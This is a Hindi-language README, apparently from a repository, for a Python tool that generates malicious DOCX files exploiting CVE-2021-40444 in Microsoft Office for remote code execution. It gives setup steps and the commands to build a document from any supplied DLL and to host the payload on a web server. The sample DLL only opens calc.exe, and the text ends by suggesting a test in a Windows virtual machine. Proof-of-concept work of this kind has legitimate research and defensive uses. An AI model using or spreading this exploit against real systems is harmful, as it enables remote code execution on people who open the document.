
दुर्भावनापूर्ण DOCX जनरेटर जो CVE-2021-40444 का शोषण करता है, तैयार किए गए Office दस्तावेज़ों के माध्यम से रिमोट कोड निष्पादन के लिए, पेलोड वितरण के लिए एकीकृत होस्टिंग सर्वर के साथ।
CVE-2021-40444 (माइक्रोसॉफ्ट ऑफिस वर्ड रिमोट कोड एक्जीक्यूशन) का शोषण करने के लिए दुर्भावनापूर्ण docx जनरेटर
इस स्क्रिप्ट का निर्माण वास्तविक दुनिया में उपयोग किए गए नमूने पर किए गए कुछ रिवर्स इंजीनियरिंग पर आधारित है: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx फ़ाइल)
आपको पहले lcab इंस्टॉल करना होगा (sudo apt-get install lcab)
मैन्युअल पुनरुत्पादन चरणों के लिए REPRODUCE.md देखें
यदि आपका जनरेट किया गया cab काम नहीं कर रहा है, तो exploit.html URL को calc.cab पर इंगित करने का प्रयास करें
पहले एक DLL दिए जाने पर एक दुर्भावनापूर्ण docx दस्तावेज़ जनरेट करें, आप test/calc.dll पर मौजूद DLL का उपयोग कर सकते हैं जो system() के कॉल से एक calc.exe पॉप करता है
python3 exploit.py generate test/calc.dll http://<SRV IP>

एक बार जब आप दुर्भावनापूर्ण docx जनरेट कर लें (यह out/ पर होगा), तो आप सर्वर सेटअप कर सकते हैं:
sudo python3 exploit.py host 80

अंत में, एक विंडोज वर्चुअल मशीन में docx आज़माएं:
